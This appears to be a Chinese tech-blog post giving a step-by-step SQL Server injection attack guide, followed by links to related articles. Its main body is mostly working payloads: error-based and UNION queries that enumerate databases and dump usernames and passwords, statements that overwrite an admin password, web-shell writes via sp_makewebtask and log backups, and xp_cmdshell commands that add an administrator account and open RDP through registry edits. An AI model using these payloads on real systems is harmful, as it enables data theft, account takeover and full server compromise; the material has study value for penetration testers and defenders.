sql 注入获取服务器信息,SQL注入之SQL server

最新推荐文章于 2024-07-23 01:07:40 发布
最新推荐文章于 2024-07-23 01:07:40 发布
阅读量656 收藏 1
点赞数
文章标签: sql 注入获取服务器信息

基础知识

1.SQL server是微软推出的关系型数据库,所以SQL server只能搭配Windows服务器使用;

2.SQL server数据库一般搭配的脚本语言为asp或aspx;

3.SQL server默认端口:1433

4.SQL server数据库以文件形式存在,文件后缀:

①x.mdf(数据库文件后缀)

②x.ldf(数据库日志文件后缀)

5.权限划分:

数据库权限

对应服务器权限

可执行的操作

SA权限

system

数据库操作,文件管理,命令执行,注册表读取

db权限

users-adminstrators

文件管理,数据库操作等

public权限

guest-users

数据库操作

注入利用

一、显错注入

1.数据库信息获取:

① 判断注入:通过修改URL参数判断是否将参数带入到数据库执行,如果有带入。即表示目标可能存在sql注入漏洞

②判断数据库类型:

And (select count(*) from sysobjects)>0     # mssql数据库And (select count(*) from msysobjects)>0    # access数据库

③读取mssql信息:

and (1=select @@version) # 报错读取数据库版本#直接?id=@@version也能读取数据库版本

and 1=(select db_name())       //报错读取数据库名#直接?id=db_name()也能读取数据库名

39b1120132705f42cf791239659d8372.png

2.数据获取

①获取数据库名称

And 1=(select top 1 name from master..sysdatabases where dbid>4)//查询第一个数据库名。dbid>4是排除SQL server数据库自带的4个系统数据库And 1=(select top 1 name from master..sysdatabases where dbid>5)//根据这个原理,通过修改dbid序号依次读取所有数据库名称And 1=(select top 1 name from master..sysdatabases where dbid>4 and name <>'数据库名')//添加条件排除获取到的数据库名称来读取下一个数据库名,效果和dbid>5相同

2d695d8cd78439d3cd1c3c848fb784df.png

And 1=(select name from master..sysdatabases for xml path)//以xml格式列出所有数据库名

6fcbfc3343d739f743105763bd0a05ee.png

② 获取表名

And 1=(select top 1 name from sysobjects where xtype='u')//返回表名newssAnd 1=(select top 1 name from sysobjects where xtype=’u’ and name <>'newss')//爆出另外一个表名。在后面不停and name <>'表名',即可依次获取所有表名

842a3f762ac16307d401accbc38c252e.png

And 1=(select name from sysobjects for xml path )//以xml格式获取所有表名,但是无法指定数据库。无法判断表所属库

50fdea4a3dc4ac311b0ee24ab427cc05.png

③获取列名

and 1=(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'newss'))//获取newss表下第一列。and 1=(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'newss')and name <>'id')//获取newss表下排除id列的第一列。依次往下套娃,可获取所有字段名称

7c630fae810b23041980cd1c8f76f4e9.png

④获取字段内容

and 1=(select top 1 username from newss)and 1=(select top 1 password from newss)//读取字段username,password第一列内容

976f95e1b57d6baca8f5abbfeedebb9b.png

and 1=(select top 1 username from newss where username <> 'admin')//带条件读取其他行的内容and 1=(select username from newss where id =2)//也可以通过操控id值读取其他行的数据

二、union注入

①判断字段数

order by 5--//这里--是单行注释符,也可以写做#,根据回显判断当前表字段数为4(执行结果)

② 找到可以进行注入的字段

UNION SELECT null,null,null,null//返回正常UNION SELECT 1,null,null,null//返回正常,说明第一列是数字型UNION SELECT null,2,null,null//报错,说明第二列是字符列。这样就可以在第二列进行注入

66afae861fa64a85894959c851fe5c60.png

③获取库信息

UNION SELECT null,db_name(),null,nullUNION SELECT null,@@version,null,nullUNION SELECT null,@@servername,null,null

e17b5a39d23cb8fd326c2509ab987c5d.png

④查询表名

UNION SELECT null,(select top 1 name from sysobjects where xtype='u'),null,null//当前表名UNION SELECT null,(select top 1 name from sysobjects where xtype='u' and name <>'newss'),null,null//套娃获取其他表名

fbbfd9401b7748328d91d574e037e040.png

⑤获取列名

UNION SELECT null,(select top 1 name from syscolumns where id in (select id from sysobjects where name='newss') and name not in (select top 0 name from syscolumns where id in (select id from sysobjects where name='newss'))),null,null//指定表newss名列第一列列名UNION SELECT null,(select top 1 name from syscolumns where id in (select id from sysobjects where name='newss') and name not in (select top 1 name from syscolumns where id in (select id from sysobjects where name='newss'))),null,null//指定表newss名列第二列列名

2880d9441a57652f243627dea75c21a5.png

⑥列数据

UNION SELECT null,username,password,null from newss//查询newss表下username,password字段所有内容。//这里因为第三列也是字符型列,如果不是就要将username,password字段分开查询UNION SELECT null,username,null,null from newss  where username not in (select top 0 username from newss)//有时候直接跟表名无法查询可以用这个语句

47306cbab5ce1ef25a6486ac99eff15a.png

SA提权

① 权限判断

and 1=(select is_srvrolemember('sysadmin')) //判断是否是系统管理员and 1=(select is_srvrolemember('db_owner')) //判断是否是库权限and 1=(select is_srvrolemember('public')) //判断是否为public权限and 1=convert(int,db_name())或1=(select db_name()) //当前数据库名and 1=(select @@servername) //本地服务名and 1=(select HAS_DBACCESS('master')) //判断是否有库读取权限

②修改管理员密码

;update newss set password='49ba59abbe56e057' where username='admin'//将管理员表admin中admin用户的密码设置为123456,修改之前把原来密码备份,操作完成后修改回来//通常在密码解不出又需要进管理员后台的情况下选择使用该方法

③直接getshell

;exec sp_makewebtask 'C:\inetpub\sql_inject\sqlserver 注入点\x1.asp','select'''''--//根据报错信息找到网站物理路径写入一句话

;EXEC sp_configure 'show advanced options',1;RECONFIGURE;;exec sp_configure 'Web Assistant Procedures', 1; RECONFIGURE//如果报错:找不到存储过程 'sp_makewebtask'。需要恢复sp_makewebtask存储过程再写入一句话#如果目标是server2008及以上sp_makewebtask 这个存储过程就取消了无法再恢复

④调用系统命令

and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell')//判断xp_cmdshell扩展存储是否存在and 1=(select count(*) from master.dbo.sysobjects where name='xp_regread')//判断xp_regread扩展存储过程是否存在;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;//恢复xp_cmdshell:

;exec master..xp_cmdshell 'net user test 123.com /add';exec master..xp_cmdshell 'net localgroup administrators test /add'// 新建用户,注意SQL server2008及之后版本需要强口令。如果sa被降权则无法创建用户

⑤开3389

;exec master..xp_cmdshell 'sc config termservice start=auto';exec master..xp_cmdshell 'net start termservice';exec master..xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f'//允许外部连接开启3389;exec master..xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x50 /f'//改端口到80;exec master..xp_cmdshell "wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1"--//利用dos命令开启3389

dbowner提权

//找到web目录后,就可以写入一句话木马了;alter database ssdown5 set RECOVERY FULL;create table test(str image)--;backup log ssdown5 to disk='c:\test' with init--;insert into test(str)values ('')--;backup log ssdown5 to disk='c:\inetpub\wwwroot\x.asp'--;alter database ssdown5 set RECOVERY simple

工具输入注入点和物理路径,直接拿shell。一步到位:

===============================================

weixin_39565021
关注
利用SQL语句得到代表该服务器唯一硬件信息-网卡ID
03-31
利用SQL语句得到代表该服务器唯一硬件信息网卡ID,可用于程序加密。在SQL Server2005/2008中得到验证,需要启用 xp_cmdshell。
SQL SERVER如何通过SQL语句获服务器硬件和系统信息
weixin_34203832的博客
11-23 250
    在SQL SERVER中如何通过SQL语句获取服务器硬件和系统信息呢?下面介绍一下如何通过SQL语句获取处理器(CPU)、内存(Memory)、磁盘(Disk)以及操作系统相关信息。如有不足和遗漏,敬请补充。谢谢! 一:查看数据库服务器CPU的信息 ---SQL 1:获取数据库服务器的CPU型号 EXEC xp_instance_regread     'HKEY_LOCAL_MACHI...
SQL注入-高权限注入(上)
最新发布
m0_73902453的博客
07-23 954
在上上个文章中有提到,在我们搭建的mysql数据库的服务器中包含4个数据库,分别数information_schema库,informance_schema库,mysql库,以及sys库,其中mysql库里就有保存我们用户的一些信息,包括能够访问的权限等。高权限注入就是例如网站A含有SQL注入漏洞,那我们注入后通过MYSQL服务器不止能够访问数据库A还可以同时对数据库B进行查看,但前提是网站A使用的账号也就是访问的用户权限足够访问数据库B,一般是root权限等。首先我们要知道MYSQL的权限级别有哪些。
查看有关SQL SERVER 2005服务器实例的属性信息
zh000888的专栏
06-01 2392
SERVERPROPERTY ( propertyname ) 包含要返回的服务器属性信息的表达式。propertyname 可以是下列值之一:  属性名称 返回的值 BuildCl
mysql注入如何读取本地文件_如何通过SQL注入获取服务器本地文件
weixin_28843191的博客
01-28 591
写在前面的话SQL注入可以称得上是最臭名昭著的安全漏洞了,而SQL注入漏洞也已经给整个网络世界造成了巨大的破坏。针对SQL漏洞,研究人员也已经开发出了多种不同的利用技术来实施攻击,包括非法访问存储在远程数据库中的数据、从服务器读/写数据、以及通过MSSQL的SA账号完成任意命令执行等等。在这篇文章中,我们准备利用一个存在于文件下载函数中的SQL注入漏洞,我们将利用存在漏洞的SQL语句并从远程服务器...
利用Xp_Cmdshell取得服务器的管理权,很可怕的SQL注入
lee576的专栏
07-17 1万+
在MSSQL中具有sysadmin权限的用户可以通过xp_cmdshell存储扩展以system的权限执行任意系统命令,因此大多数对安全比较重视的管理员都会将它删除,即使没有删除也有可能会由于获得的权限不足而前功尽弃。因此获得了xp_cmdshell的执行权限也就成了大多数SQL Injection攻击方法的终极目标。我给大家介绍一下在此过程中涉及到的几个关键问题及其解决方法。权当是抛砖引玉。
SQL注入漏洞全接触.ppt
11-15
* SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及服务器信息,从而获取攻击者想得到的资料。 二、 SQL注入漏洞的危害 * SQL注入漏洞可能导致敏感数据泄露、服务器被入侵、网站沦陷等严重后果。 * ...
pangolinsdl—sql注入工具
06-20
SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和防御。PangolinsDL就是这样一个工具,它...
C#防SQL注入代码的三种方法
12-31
对于网站的安全性,是每个网站开发者和运营者最关心的问题。网站一旦出现漏洞,那势必将造成很大的损失。为了提高网站的安全性,首先网站要防注入,最重要的是服务器的安全... C#防SQL注入方法一  在Web.config文件中
在IIS SQL Server中利用ISAPI ReWrite防SQL注入攻击.pdf
09-19
随着网络应用的普及,尤其是基于B/S(Browser/Server,浏览器/服务器)结构的信息系统广泛部署,其安全问题也随之日益凸显。在众多网络攻击手段中,SQL注入攻击因其破坏力强、实施简单而备受攻击者的青睐。SQL注入...
sql注入网站源码
04-09
这个"sql注入网站源码"提供了一个具有SQL注入漏洞的ASP(Active Server Pages)网站实例,对于学习如何检测、防范和修复这类漏洞非常有价值。ASP是微软开发的一种服务器端脚本语言,常用于构建动态网站。 在ASP中,...
SQL注入实战---利用“dbo”获得SQL管理权限和系统权限
巅峰测试
08-03 1140
在一个供求信息发布的网站上测试了一下,页面http://www.xxx.com/new/new.asp?id=49我做了如下测试:(1) http://www.xxx.com/new/new.asp?id=49’Microsoft OLE DB Provider for ODBC Drivers 错误 80040e14[Microsoft][ODBC Microsoft Access Dri
sql语句 获取服务器信息,SQL Server 获取服务器时间的sql语句
weixin_39748183的博客
08-12 456
这篇文章主要介绍了SQL Server 获取服务器时间的sql语句,需要的朋友可以参考下SQL SERVER 2000用sql语句如何获得当前系统时间就是用GETDATE();Sql中的getDate()Sql Server 中一个非常强大的日期格式化函数Select CONVERT(varchar(100), GETDATE(), 0): 05 16 2008 10:57AMSelect CON...
渗透测试公司之实战SQL注入拿下网站权限
网站安全资讯
12-08 2345
近来,利用sql注入、xss和文件上传漏洞,成功getshell的一个客户网站(必须要拿到客户授权渗透测试许可证明才可以,不得违法入侵),这里简单记录一下整个过程,与...
mysql sql注入怎么获取数据_手把手教你通过SQL注入盗取数据库信息
weixin_39940344的博客
02-17 1268
目录数据库结构注入示例判断共有多少字段判断字段的显示位置显示登录用户和数据库名获取所有数据库名获取对应数据库的表获取对应表的字段获取所有的用户密码我们都是善良的银!一生戎码只为行侠仗义,知道这个不是为了做啥非法的事,只是知道小偷怎么偷东西才能更好地防范。SQL注入(SQL Injection),指将非法的SQL命令插入到URL或者Web表单中请求,而这些请求被服务器认为是正常的SQL语句进行执行。...
SQL注入试验一(获取数据库内容)
热门推荐
Toby的博客
10-10 1万+
这篇博客是讲述SQL注入的实例操作,废话不多说,下面开始:      第一步我们要先判断是否存在注入点      进入实验的网站,如下:       然后在网址后面输入单引号'   回车(如下图,出现错误)       接下里在网址后面输入 and 1='1(此处需要注意闭合单引号,网页恢复正常)       然后将 and 1=‘1 改成 and 1=‘
渗透实战:从sql注入撸下服务器
白泽Sec安全实验室
11-25 641
前言:大家好!在一次网上冲浪中,走狗屎运发现了一处sql注入信息收集: 接下来赶紧探测一下网站指纹信息 找到ip之后随手测试发现有四个旁战 开放端口:21、25、80、135、143、3306、3389、49155、49156 扫描目录扫描出后台登陆框(但是页面破损无法正常浏览),因为没有WAF直接sqlmap一把梭,一步到胃! 并非是管理员权限,在数据库翻箱倒柜找了一通,在快要放弃的时候找到一些敏感信息:数据库管理员用户密码。 由于有注入的这个站点,登录地址破损无法正常显示,回想起来还有旁站。回过
一次SQL注入到拿下域控的渗透测试实战演练(下)
weixin_59086772的博客
07-23 305
雨笋教育小编来分享干货了! 本次渗透使用工具: mimikatz,PsExec 本次渗透网络拓扑图: 开始渗透 上一篇文章中我们讲到我们成功渗透了目标内网中web服务器并提取其管理员明文密码,通过明文密码又成功登陆了内网中的另一台机器(10.0.1.8) 将mimikatz上传到10.0.1.8后运行下列命令进行提权和抓取管理员密码: privilege::debugsekurlsa::logonpasswords 发现域管理员账号曾经登陆过这台机器,...
获取sqlserver数据库中所有库、表、字段名的方法
weixin_30512089的博客
12-14 137
获取sqlserver数据库中所有库、表、字段名的方法 2009年03月12日 星期四 下午 12:51 1.获取所有数据库名: SELECT Name FROM Master..SysDatabases ORDER BY Name 2.获取所有表名: SELECT Name FROM DatabaseName..SysObjects Where XType='U' ORDER B...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值